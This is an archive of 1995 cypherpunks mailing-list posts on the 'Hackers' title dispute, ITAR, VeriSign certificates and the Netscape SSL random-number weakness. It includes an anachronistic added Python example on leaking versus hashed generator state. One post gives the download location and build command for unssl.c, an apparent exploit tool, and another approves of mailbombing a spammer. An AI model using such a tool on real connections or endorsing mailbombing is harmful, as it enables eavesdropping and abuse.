Message-ID: <Pine.3.89.9509181245.A28856-0100000@echonyc>
MIME-Version: 1.0
Content-Type: text/plain


It's my impression that the play was staged a few years after my book 
came out in 1984 (though I chose the title in 1982). I remember reading 
the reviews then, and they didn't 
seem to mention that it was a revival of a years-old play whose name I had 
unintentionally used for my own book. (Unlike the case for the current 
movie, whose screenwriter seemed to know of my own book.)  If 
you have evidence that the play was indeed produced before 1984, please 
let me know.  Otherwise, I'd be happy to accept your apology, Peter.

On Mon, 18 Sep 1995, Peter Trei wrote:

> 
> > >I saw "Hackers" yesterday. It's not bad and its political sensibility is
> > >very cyberpunk. The ad campaign even uses the tag line, "Their only crime
> > >is curiosity." 
> 
> > It may not be a crime, but it's not nice to steal a title.
> 
> You mean, like you stole it from Dale Luck's (duck@mit oz) stage play of the same name?
> I saw this (in an Off-Off-Broadway production), years before your book came
> out.
> 
> 
> 
> 
> Peter Trei
> Senior Software Engineer
> Purveyor Development Team                                
> Process Software Corporation
> http://www.process.com
> trei@process.com
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@left.webcasters.com (Jim Grubs (W8GRT))
Date: Mon, 18 Sep 95 09:29:26 PDT
To: cypherpunks@toad.com
Subject: Re: "alt.cypherpunks" Newsgroup vs. Mailing List?
Message-ID: <D7TmBD1w165w@left.webcasters.com>
MIME-Version: 1.0
Content-Type: text/plain


hallam@w3.org writes:

> 
> >Should there be an "alt.cypherpunks" type of newsgroup instead of this
> >mailing list?
> 
> Bad idea, it would simply mean that every kook on USEnet would add 
> alt.cypherpunks onto the crossposting line. We would have black helicopters, 
> loons, Waco Wako's, Loonytarians and turkish government propaganda spamming 
> forever.

Hey, create the alt. group and let it draw the kooks. Nobody said WE have to
read it. We can stay here as usual...


--
                        WebCasters(tm)
James C. Grubs                         jgrubs@left.webcasters.com
6817 Maplewood Avenue                         Tel.: 419-882-2697
Sylvania, Oh 43560                             Fax: 419-885-2814
  Internet consulting, HTML programming, Information brokering
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Mon, 18 Sep 95 09:28:13 PDT
To: cypherpunks@toad.com
Subject: Re: Joe Sixpack and his TV
Message-ID: <v02120d00ac830d476a45@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 9:20 PM 9/17/95, Black Unicorn wrote:

>As I understand it shows like "The X-Files" don't accept unsolicited
>scripts.  Not surprising as I'm sure they have writer's agreements.

And, given how popular the show is, I doubt their *writers* even accept
unsolicited *phone calls*. In principle, the idea of working on positive
media exposure is a good one; in practice, it'll likely be mostly
dangerous, since there's no way to guarantee a pro-crypto slant when
anticrypto slants will widely be seen as making for better "drama."
        Any number of soap writers would bite a crypto hook if someone took
the time to contact them--except on shows like that secrets are *bad*
(e.g., So-and-so is suspected of Murdering Whoever for Financial Reasons,
but refuses to give up the Password to his Encrypted Files, so Some Chick
Seduces him and slips an Invisible Keystroke Capture Program, written by
her Little Hacker Brother, onto his computer to Reveal the Ugly Truth). The
news programs won't be much better, since reporters, being a suspicious
lot, tend to dislike secrets too.
        Maybe try the Simpsons, hey? I see it all now: Bart encrypts Homer
and forgets the password. As far as the family's concerned, the blob of
random friction that sits around watching TV and drinking beer is fine, but
Homer's boss starts to worry that Homer's looking a bit unkempt...


ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: goedel@tezcat.com (Dietrich J. Kappe)
Date: Mon, 18 Sep 95 10:32:48 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape's random numbers
Message-ID: <v01510100ac836b357d90@[206.1.161.4]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Congrats, nice job!

Yes, well done.

>The Netscape license explicitly prohibits decompiling (except where such
>prohibition is illegal).  When this hits the media it will be important
>to avoid being tarred with the "hacker breaks rules and breaks in" brush.
>More subtly, it's probably a bad idea to call into question the overall
>business model of client binaries on the net.
>
>Instead, emphasize importance of open code, public reviews, ability to
>link in your own code that meets public specs, etc.  All of these things
>the Internet was designed to do, and U.S. ITAR regulations are designed
>to prohibit (globally, anyway).  And also that the bad guys will never
>play by the rules.  And re-emphasize that solutions are possible, just
>that the U.S. government prevents them from being deployed in a global
>economy.

Before we go to the news, perhaps we should demonstrate the exploitation of
this hole. It would certainly make selling this story a whole lot easier.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBgAwUBMF27PHIf3YegbdiBAQGI7AJXY5d2Su52MWXrh6tP20vOai/Rsbd6+oqx
urWUP34wPv5dqMv1Mw6XDlstX5Q3KmOMeTOjAwcjuJXY5Z3RhkL0gi0nMBUS/IdZ
b/GN
=vhHo
-----END PGP SIGNATURE-----

Dietrich Kappe | Red Planet    http://www.redweb.com
Red Planet, LLC| "Chess Space" | "MS Access Products" |  PGP Public Key
1-800-RED 0 WEB|    /chess     |       /cobre         | /goedel/key.txt
Web Publishing | Key fingerprint: 8C2983E66AB723F9 A014A0417D268B84






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Mon, 18 Sep 95 09:47:11 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Linking = Showing = Transferring?
In-Reply-To: <199509181421.KAA01808@panix.com>
Message-ID: <Pine.SUN.3.91.950918124125.1825D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 18 Sep 1995, Duncan Frissell wrote:

> At 08:33 AM 9/15/95 -0700, Charles Lewton wrote:
> 
> >Not quite squashed, Duncan.  Bullet placement (poor by some standards)
> >is all that prevented Mr. Weaver from croaking like his unfortunate wife.
> >She is said to have "pissed off" the feds but was not charged with a
> >single actionable item yet she remains quite dead.
> >
> >Unless I have missed something somewhere, no TLA is concerned in the slightest
> >with individual liberty.  That notion should keep a rational person awake
> >nights.
> >
> >Chuck
> >
> 
> In response to Chuck and Lucky, I can only say that the Weavers suffered 57%
> casualties (4/7) and 28% KIA (2/7).  The Feds suffered .25% KIA (1/400).  I
> don't think any Feds were merely wounded.
> 
> They brought murder charges against two members of the group and lost.

Careful here, they lost because the FBI refused to cooperate with the 
prosecutor.  It was looking like an open and shut case before this.

>  They settled wrongful death suits for $3.1 million.  They also lost 
> the publicity war.  They had to change their procedures because of Ruby 
> Ridge and Waco.

Actually, they just reinforced the old policy, which had been degrading 
in practice for quite a long while in the case of Ruby Ridge.

> They energized the opposition.
> 
> The casualties were unfortunate but when facing force ratios of 57/1 or
> better, the outcome has to be considered a major victory for Randy Weaver.

Considering the limited rules of engagement (i.e. low intensity sniper 
conflict only) I don't think you can really take 57/1 as a force ratio of 
meaningful impact.

> The case is a demonstration of modern conflicts in which litigation and
> publicity count as much as guns.  On that field, the Feds don't hold all the
> cards.

On this I agree with you.

> 
> DCF
> 
> "The libertarian and conservative coalition of the 'Right' is a
> low-maintenance coalition because its members mostly want to be left alone
> while the special interest group coalition of the 'Left' is a
> high-maintenance coalition because all of its members need to be given a
> vast dose of government cash daily."   
> 
> 
> 

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 18 Sep 95 09:51:36 PDT
To: Eric Young <eay@mincom.oz.au>
Subject: Re: Netscape Navigator 2.0 will implement secure e-mail
In-Reply-To: <Pine.SOL.3.91.950918185301.29263B-100000@orb>
Message-ID: <199509181651.MAA00479@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Eric Young writes:
> On 18 Sep 1995, Jeff Weinstein wrote:
> > The implementation guide recommends using rc2-cbc 40-bit for content
> > encryption when there is no way to determine the capabilities of the
> > recipient.  When you do know what the recipient can do, it recommends
> > using RC2-CBC with a longer key or DES-CBC.
> 
> Hmm....  notice the use of a non public cipher as the base cipher.... 
> what a shame.... 

It's also a shame that they aren't sticking to MOSS, which is the open
IETF standard for such stuff.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Mon, 18 Sep 95 10:00:05 PDT
To: <trei@process.com
Subject: Re: "Hackers"-- brief review and anecdote...
Message-ID: <9509181659.AA22457@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



> It's my impression that the play was staged a few years after my book 
> came out in 1984 (though I chose the title in 1982). I remember reading 
> the reviews then, and they didn't 
> seem to mention that it was a revival of a years-old play whose name I had 
> unintentionally used for my own book. (Unlike the case for the current 
> movie, whose screenwriter seemed to know of my own book.)  If 
> you have evidence that the play was indeed produced before 1984, please 
> let me know.  Otherwise, I'd be happy to accept your apology, Peter.
> 
> On Mon, 18 Sep 1995, Peter Trei wrote:
> > > >I saw "Hackers" yesterday. It's not bad and its political sensibility is
> > > >very cyberpunk. The ad campaign even uses the tag line, "Their only crime
> > > >is curiosity." 
> > > It may not be a crime, but it's not nice to steal a title.
> > You mean, like you stole it from Dale Luck's (duck@mit oz) stage play of the same name?
> > I saw this (in an Off-Off-Broadway production), years before your book came
> > out.

If I'm wrong (and I would not be surprised  - I'm relying on fuzzy
memories here), please consider my abject apology tendered.

Namespace collisions seem to happen quite frequently in titles. I can 
remember when TMC made a big deal out of their intention to air
"Brainstorm", the 1983 film with Natalie Wood. I settled down to
watch, and up came a black and white movie with a totally different
plot - it turned out they had been sent the 1965 film of that name,
and no one had checked. Looking in the (ex)Cardiff film database, I
note that there is now a 3rd movie of the title (1994).

A couple weeks ago my daughter was making a big deal about 
wanting to watch "The Red Shoes" on Disney. I was thinking of
the 1948 ballet movie, and told her I didn't think she'd like it. She
insisted, and it turned out to be a 30 minute (and charming in
a cloying sort of way) cartoon.







Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 18 Sep 95 13:11:24 PDT
To: cypherpunks@toad.com
Subject: information on SSL brute force hacks wanted
Message-ID: <199509182005.NAA08898@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	I'm putting together the hack netscape promotion (I still
need to find someone to design the t-shirt) and need to know some
information.

1) Who wrote the sslbrute software package and keyserver? Who managed
the distributed cracking event?

2) Who broke Hal's first challenge?

	Please send me names email addresses and URLs.

	If you know of other people who you think deserve recognition
for hacking netscape products, contact me.

	To see the page while under construction look at
http://www.c2.org/hacknetscape -- please don't link to it, as it is
obviously under construction.

-- 
sameer						Voice:   510-601-9777
Network Administrator				FAX:	 510-601-9734
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Mon, 18 Sep 95 10:12:30 PDT
To: cypherpunks@toad.com
Subject: ftp://www.brooks.af.mil/pub/unix/utils/des.tar
Message-ID: <9509181711.AA15476@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain



This seems to be
  /* Sofware DES functions
   * written 12 Dec 1986 by Phil Karn, KA9Q; large sections adapted from
   * the 1977 public-domain program by Jim Gillogly
   * Modified for additional speed - 6 December 1988 Phil Karn
   * Modified for parameterized key schedules - Jan 1991 Phil Karn

Would someone from outside the US try to download the above file?
It would be, at least, amusing if an Air Force site were in violation
of the ITAR (their README notwithstanding).
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Zamick <JonathanZ@consensus.com>
Date: Mon, 18 Sep 95 13:07:16 PDT
To: cypherpunks@toad.com
Subject: RSAREF Commercial Licensing
Message-ID: <v02130501ac838ffc6fe8@[157.22.240.13]>
MIME-Version: 1.0
Content-Type: text/plain


Well I've vacillated between making a formal, dry announcement or
letting you all know my way. Given the general tenor (and individual
spirit) of many on Toad it is pretty easy to guess which path I chose.

So, first of all, here is to a productive future for encryption and
encryption technologies. Consensus Development and RSA Data Security
have finalized the contract for Consensus to license and support
RSAREF(tm) for commercial use.

This isn't an advertisement for RSAREF -- as we are seeking to first
present our license to those who have already expressed interest in
the product to 'beta-test' our standard agreement. Meanwhile, we would
like to gather some information from the net community.

Our foremost concern is for those who have been using RSAREF in
the past. If you have discovered any bugs which have either gone
unreported or unfixed, we need to know ASAP. No bugs have been
officially reported in version 2.0, however we have heard in the
past that some may have been found. If a report has gotten lost
during this period of transition, we'd like to know. Consensus'
first priority is to make sure RSAREF is bug free.

Secondly, for those who have contributed code to RSAREF in the
past, or have code they'd like to submit, send email to me at the
address below. Our hope is that RSAREF will continue to improve
and meet the needs of its users through the co-support of both
Consensus Development and our commercial and non-commercial
RSAREF developers.

Lastly, we would like to hear suggestions and ideas on how to
improve RSAREF. We intend to remain responsive to requests, and
welcome ideas for the evolution of the RSAREF toolkit.

Anyway, again, have a good day. For those who would like to be
on our RSAREF announcement list, send mail to
<RSAREF-Ann-L@consensus.com> with 'Subscribe' in the Subject
header.

Note: RSAREF is a trademarked term by RSA Data Security

Thank you all for your patience, I'm sure many will be as excited
as I am.

Jonathan Zamick
Knowledge Officer

------------------------------------------------------------------------
..Jonathan Zamick                    Consensus Development Corporation..
..<JonathanZ@consensus.com>                      1563 Solano Ave, #355..
..                                             Berkeley, CA 94707-2116..
..                                        o510/559-1500  f510/559-1505..
..Mosaic/WWW Home Page:                                               ..
..  Consensus Home Page  ..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: turner@telecheck.com
Date: Mon, 18 Sep 95 12:29:14 PDT
To: Jim Ray <liberty@gate.net>
Subject: Re: (noise) Re: SPAM bait
In-Reply-To: <199509161913.PAA55049@tequesta.gate.net>
Message-ID: <9509181927.AA18728@TeleCheck.com>
MIME-Version: 1.0
Content-Type: text/plain


> nobody@alpha.c2.org (Anonymous) wrote: 
> <snip>
> >
> >Don't worry, "Janet Dove", or actually sanghi3@grfn.org got mailbombed
> >severely for this one.  I'm just glad he doesn't know how to use remailers.
> 
> Good going, Anonymous. What I don't understand about inappropriate
> SPAMs like that one (or telephone ads) is; what's the business
> incentive to do it? I assume that no Cypherpunk has subscribed to
 <snip>
> JMR
> 

I'm no lawyer (and probably wouldn't admit to it if I was.. ;) ) but
in most states there are laws restricting advertisement wherein the
target of the advertising does not have to pay for the privilege of
being advertised to.  I believe this came about right after FAX machines
started taking off, and people were sending out advertisements wasting
fax paper and jamming telephone lines.

Can't this be applied to the internet?  I believe someone sued Visa
when he was forced to receive junk e-mail on CompuServe (I think he
even won.) Anyone have any info on this?

 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Claborne <Chris.Claborne@SanDiegoCA.ATTGIS.COM>
Date: Mon, 18 Sep 95 15:14:59 PDT
To: cypherpunks@toad.com
Subject: VeriSign Introduces the First Digital ID Issuing Service
Message-ID: <9509181742.aa29912@ncrhub1.ATTGIS.COM>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I thought the following would be interesting.  It looks similar to what SLED
wanted to do.  Would be interested to see what their method of verification is.

- -------------
[Begin forwarded message ]

VeriSign Introduces the First Online Digital ID Issuing Service; Users
Get Unique Digital IDs to meet the Security Needs of Commerce and
Communications

REDWOOD CITY, Calif.--(BUSINESS WIRE)--Sept. 18, 1995--VeriSign today
announced the World Wide Web's first Online Digital ID Issuing Service.
Being released in conjunction with Netscape Navigator 2.0, this service
will allow users to directly enroll and receive their own unique Digital
IDs. VeriSign defined today the class structure of its Digital ID brand
of public identification certificates, establishing four classes of
identification to meet the varying security needs within different
environments.

The service will begin Beta testing in late October. A company or a
consumer will be able to get a unique Digital ID online through
VeriSign's Online Digital ID Issuing Service located on the World Wide
Web. A user can register for a non-commercial Class One Digital ID at no
cost, or a commercial version for $6, through an online autoresponder.
This unique Class One Digital ID is designed for casual World Wide Web
browsing and secure e-mail and is used by Netscape Navigator 2.0 to
allow users to communicate securely and identify themselves to other
users, as well as merchants on the Internet.

"The Online digital ID Issuing Service was created to provide a one-step
process for obtaining a Digital ID for our corporate and individual
users," said Stratton Sclavos, President and CEO of VeriSign, Inc. "We
are offering non-commercial users Class One Digital IDs at no cost to
introduce the concepts of authentication and privacy to the market. We
will also offer higher classes online using higher assurance policies.
We believe Digital IDs will help everyone in the online community safely
conduct their business or personal transactions over public and private
networks."

Public identification certificates


Working closely with application developers, service providers and
affiliates, VeriSign issues and manages multiple classes of Digital IDs
supporting a wide range of public identification certificate-enabled
products like Netscape Navigator 2.0. VeriSign's public identification
certificates can be issued for individuals as well as entities such as
merchant servers. These public identification certificates, categorized
into four classes with escalating levels of identity assurance, can be
obtained from VeriSign directly or through the Online Digital ID Issuing
Service.

Class One Digital IDs: These IDs insure the uniqueness of a name or
e-mail address. Class One Digital IDs are primarily used for casual
World Wide Web browsing and secure e-mail. VeriSign offers
non-commercial Class One Digital IDs at no cost or VeriSign supported
commercial versions for $6.

Class Two Digital IDs: These IDs provide a higher level of assurance
regarding a person's identity by involving third-party proof of name,
address and other personal information provided in the registration
process. Class Two Digital IDs are primarily used for inter-company
e-mail, online purchasing from electronic malls and online
subscriptions.

Class Three Digital IDs: These IDs further raise the level of identity
assurance by involving personal presence or registered credentials.
Class Three Digital IDs are used primarily for transactions demanding a
higher level of assurance of the identity of an individual. Typical
applications include electronic banking, large-sum purchases from
electronic malls and membership-based online services. VeriSign
additionally offers Class Three Digital IDs for electronic commerce
servers such as Netscape's Commerce Server and Open Market's Secure
WebServer.

Class Four Digital IDs: These IDs are for individuals and companies
requiring a maximum level of identity assurance. To obtain these IDs,
the individual and/or organizations they represent is more thoroughly
investigated and personal presence is required. Typical applications
include access to confidential information, authorization to trade
financial securities, and access to corporate databases.

VeriSign is the only company 100% committed to the digital
authentication market. Home banking, electronic payments, and
subscription based services are some of the areas in which VeriSign is
working, with clients that include NASA, TRW, Netscape and Apple.
VeriSign's public identification certificates offer multiple levels of
identity assurance. In addition, VeriSign is extending its certificate
issuing technology to include new X.509 version 3 format, which greatly
expands the flexibility and capability of Digital IDs. Navigator 2.0
users will be the first customers to receive version 3 compatible
Digital IDs. Being X.509 compliant, VeriSign can include authorization
parameters in a Digital ID allowing both corporate and individual users
to customize them according to their electronic commerce and
communications needs. X.509 certificates are becoming the
internationally recognized standard form of "I.D." on public and private
networks.

Pricing and Availability


Netscape Navigator 2.0 users will be able to download Class One Digital
IDs from VeriSign's new Online Digital ID Issuing Service on the World
Wide Web beginning in late October. Non-commercial Class One Digital IDs
will be offered at no cost, or if users desire a VeriSign supported
commercial version, the cost is $6 annually. Class Two Digital IDs are
available for $12 annually. Class Three Digital IDs are available for an
individual for $24 annually. Corporate site license discounts are
available. Class Three Digital IDs for an entity such as a corporate
server are available for $290 for the first Digital ID and $95 for
additional IDs at the same site annually. To obtain pricing on Class
Four Digital IDs users should contact VeriSign directly.

VeriSign, Inc.


VeriSign provides Digital ID products and services for the electronic
commerce marketplace. VeriSign's Digital IDs play a key role in ensuring
the privacy and authentication of electronic transactions and
communications. VeriSign, founded in 1995 as a spin-off of RSA Data
Security, is working with its investors including Ameritech and Visa
International, and partners such as Netscape and Apple, to open the
digital marketplace to all consumers. VeriSign's goal is to provide
consumers with the confidence necessary to conduct electronic commerce
worldwide. For more information, contact VeriSign at 415-508-1151, or
visit their Web site at http://www.verisign.com.

Note to Editors: Copyright 1995 VeriSign, Inc. 100 Marine Parkway,
Redwood City, CA 94065. All rights reserved. VeriSign is a service mark
and trademark of VeriSign, Inc. Digital ID, Providing Driver License for
the Information Superhighway and Certificate Issuing System are all
trademarks of VeriSign, Inc. All other trademarks are properties of
their respective owners.

CONTACT: VeriSign Inc.
Web Augustine, 415/508-1151
web@verisign.com
or
Niehaus Ryan Haller Public Relations
Marcos Sanchez, 415/615-7912
marcos@nrh.com
07:35 ET SEP 18, 1995



-----BEGIN PGP SIGNATURE-----
Version: 2.7.1

iQCVAwUBMF3nBFzvpSsKhLftAQHBSQP+PCmXw9P2EWjweTIWoT65BYKgmhnxZbx0
Ig0Zi7dVgFS+dIAxTnc23p4BBBapfZMrN2Ho/zhm7csPB4+XQ65y+vDVlDH8ehvA
d/b7gAtsE9tOe1YglNeeNaxba/xB2OuGN6XJHH2A8wojIPw7ALK66XMPJ6YGn24T
N7eychxo61A=
=xgjH
-----END PGP SIGNATURE-----
                                        ...  __o
                                       ..   -\<,
Chris.Claborne@SanDiegoCA.ATTGIS.Com   ...(*)/(*).          CI$: 76340.2422
http://bordeaux.sandiegoca.attgis.com/
PGP Pub Key fingerprint =  A8 FA 55 92 23 20 72 69  52 AB 64 CC C7 D9 4F CA
Avail on Pub Key server.
PGP-encrypted e-mail welcome!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Mon, 18 Sep 95 06:01:10 PDT
To: cypherpunks@toad.com
Subject: Re: "alt.cypherpunks" Newsgroup vs. Mailing List?
Message-ID: <9509181245.AA02101@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



> Bad idea, it would simply mean that every kook on USEnet would add 
> alt.cypherpunks onto the crossposting line. We would have black helicopters, gun 
> loons, Waco Wako's, Loonytarians and turkish government propaganda spamming 
> forever.

And  cancel-messages from Co$ ...


Hadmut





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Mon, 18 Sep 95 12:25:17 PDT
To: jim@acm.org
Subject: Re: ftp://www.brooks.af.mil/pub/unix/utils/des.tar
In-Reply-To: <199509181748.KAA17616@mycroft.rand.org>
Message-ID: <199509181924.PAA09406@bwface.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


	I would expect that as the folks responsible for the FTP site,
you could drag the USAF into the lawsuit as a co-defendant, then get
the suit against you dropped because of the statute of limitations,
leaving the AG investigating the Air Force. :)

Adam

| > Would someone from outside the US try to download the above file?
| > It would be, at least, amusing if an Air Force site were in violation
| > of the ITAR (their README notwithstanding).
| 
| Hurm -- if Phil Karn and I knowingly allow it to remain there, that puts
| us in the same position as Phil Zimmermann, right?  Oh -- except that our
| offenses may already be beyond the statute of limitations.

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Mon, 18 Sep 95 12:59:21 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape's random numbers
In-Reply-To: <v01510100ac836b357d90@[206.1.161.4]>
Message-ID: <9509181958.AA11906@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>Before we go to the news, perhaps we should demonstrate the exploitation of
>this hole. It would certainly make selling this story a whole lot easier.

In the first place it is a bit late for that. The problem is all over the net 
already. Expect press coverage tomorrow or Wednesday. Secondly I would prefer a 
solution.


Random number generation and maintenance is a whole lot harder than RFC 1750 
makes out. Although that RFC has some useful ideas it does not provide a 
blueprint for a secure ergodicity management facility.

When I wrote code for Shen I was very careful in the use I made of the output 
of the ergodicity manager. In particular correlation is a major concern. If a 
pseudo random output is exposed it must not prejudice other random values.

Consider the class of attacks where Mallet receives a message from Alice and 
uses the knowledge of his random number to discover the random number used in 
Alice's later message to Bob.

I always use hash functions as a "one way trap" to ensure that values cannot be 
reverse engineered to discover the internal state of the random number 
generator. I am also careful to erase all internal state before exiting the 
program. 


	Phill Hallam-Baker
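
The two precautions described in the message above (hashing values before they leave the generator, and erasing internal state on exit), as an added Python example that is not code from Shen or from the post. The LCG, the SHA-256 construction, the seeds and all names are assumptions chosen for illustration.

```python
"""Raw generator state handed out as output, versus a hashed "one-way trap".

Added illustration only: the LCG, the SHA-256 construction and every name
here are assumptions, not Shen's code. For real keys use the operating
system's CSPRNG (in Python, the `secrets` module).
"""
import hashlib

MASK64 = (1 << 64) - 1
# Multiplier and increment of a widely published 64-bit LCG (Knuth's MMIX).
LCG_A = 6364136223846793005
LCG_C = 1442695040888963407


class LeakyGenerator:
    """Returns its internal state as the 'random' value."""

    def __init__(self, seed: int):
        self.state = seed & MASK64

    def next_value(self) -> int:
        self.state = (LCG_A * self.state + LCG_C) & MASK64
        return self.state  # output == state, so one output fixes all later ones


def successor_of(observed: int) -> int:
    """What any recipient of one LeakyGenerator output can compute."""
    return (LCG_A * observed + LCG_C) & MASK64


class TrappedGenerator:
    """Keeps the state private; outputs and state updates are separate hashes."""

    def __init__(self, seed: bytes):
        self._state = bytearray(hashlib.sha256(b"init" + seed).digest())
        self._wiped = False

    def next_value(self) -> bytes:
        if self._wiped:
            raise RuntimeError("generator state has been erased")
        # Domain-separated hashes: the output is not the state, and knowing
        # the output does not give the input of the "next" hash.
        out = hashlib.sha256(b"out" + self._state).digest()
        self._state[:] = hashlib.sha256(b"next" + self._state).digest()
        return out

    def wipe(self) -> None:
        # Best effort: overwrite the mutable buffer in place. Python cannot
        # guarantee that no temporary copies of the state remain in memory.
        for i in range(len(self._state)):
            self._state[i] = 0
        self._wiped = True

    def is_wiped(self) -> bool:
        return self._wiped and not any(self._state)


def candidates_from_output(observed: bytes) -> set:
    """Apply the public hash steps to an output as if it were the state."""
    stepped = hashlib.sha256(b"next" + observed).digest()
    return {
        hashlib.sha256(b"out" + observed).digest(),
        stepped,
        hashlib.sha256(b"out" + stepped).digest(),
    }


def exchange(gen):
    """Alice draws one value for a message to Mallet, then one for Bob."""
    return gen.next_value(), gen.next_value()


if __name__ == "__main__":
    # Constructed seeds, not real entropy.
    to_mallet, to_bob = exchange(LeakyGenerator(0x19950918))
    print("leaky: Bob's value derivable from Mallet's:",
          successor_of(to_mallet) == to_bob)

    trapped = TrappedGenerator(b"constructed seed, not real entropy")
    to_mallet, to_bob = exchange(trapped)
    print("trapped: Bob's value derivable from Mallet's:",
          to_bob in candidates_from_output(to_mallet))
    trapped.wipe()
    print("state erased:", trapped.is_wiped())
```
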




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 18 Sep 95 13:17:50 PDT
To: Rich Salz <rsalz@osf.org>
Subject: Re: Netscape's random numbers
In-Reply-To: <9509181622.AA15284@sulphur.osf.org>
Message-ID: <199509182017.QAA00699@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Rich Salz writes:
> The Netscape license explicitly prohibits decompiling (except where such
> prohibition is illegal).

Which probably is most of the U.S.

It would be remarkably stupid for them to try to enforce the
provision.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@csclub.uwaterloo.ca (Ian Goldberg)
Date: Mon, 18 Sep 95 13:22:52 PDT
To: cypherpunks@toad.com
Subject: unssl.c available for ftp (was: Netscape's random numbers)
In-Reply-To: <v01510100ac836b357d90@[206.1.161.4]>
Message-ID: <43kkdu$8qa@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <v01510100ac836b357d90@[206.1.161.4]>,
Dietrich J. Kappe <goedel@tezcat.com> wrote:
>>Congrats, nice job!
>
>Yes, well done.
>
>Before we go to the news, perhaps we should demonstrate the exploitation of
>this hole. It would certainly make selling this story a whole lot easier.
>
Too late.  The news (in the form of a call from John Markoff, New York Times)
came to Dave and me first thing this morning.

In other news:

unssl.c is presently in the /pub/cypherpunks/incoming/ directory
on ftp.csua.berkeley.edu.  Remember: you must be a "US person"
to download it blah blah blah.  It will (hopefully) soon move to
a more suitable location under /pub/cypherpunks.

The HP on my desk seems to like compiling it with "gcc -O3 -o unssl unssl.c".
YMMV.

   - Ian "it's now about 1:20 pm PDT; I wonder when it will get exported..."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Mon, 18 Sep 95 13:42:07 PDT
To: cypherpunks@toad.com
Subject: Good random seeds
Message-ID: <199509182042.QAA02146@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain



	Since we can all see how badly time works, I'd like to point out
that Will Price, author of the excellent Cryptdisk utility for the Mac,
uses mouse movements to seed his PRNG.

	His code is available for a small fee, and I'd strongly suggest
that people who need good, easy PRNs take a look at it, and also take a
long look at RFC1750, randomness recommendations for security (or
something like that.)

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 18 Sep 95 17:14:24 PDT
To: iagoldbe@calum.csclub.uwaterloo.ca (Ian Goldberg)
Subject: Re: unssl.c available for ftp (was: Netscape's random numbers)
In-Reply-To: <43kkdu$8qa@calum.csclub.uwaterloo.ca>
Message-ID: <199509190006.RAA28102@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Now available in /pub/cypherpunks/cryptanalysis
Please do not export.

-- 
sameer						Voice:   510-601-9777
Network Administrator				FAX:	 510-601-9734
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Mon, 18 Sep 95 14:54:39 PDT
To: Christian Wettergren <cwe@Csli.Stanford.EDU>
Subject: Re: Code of Law ["Noise"]
In-Reply-To: <199509181837.LAA01709@Csli.Stanford.EDU>
Message-ID: <Pine.SOL.3.91.950918170807.6474A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 18 Sep 1995, Christian Wettergren wrote:

> 
> | >"The basic idea behind the movement," says
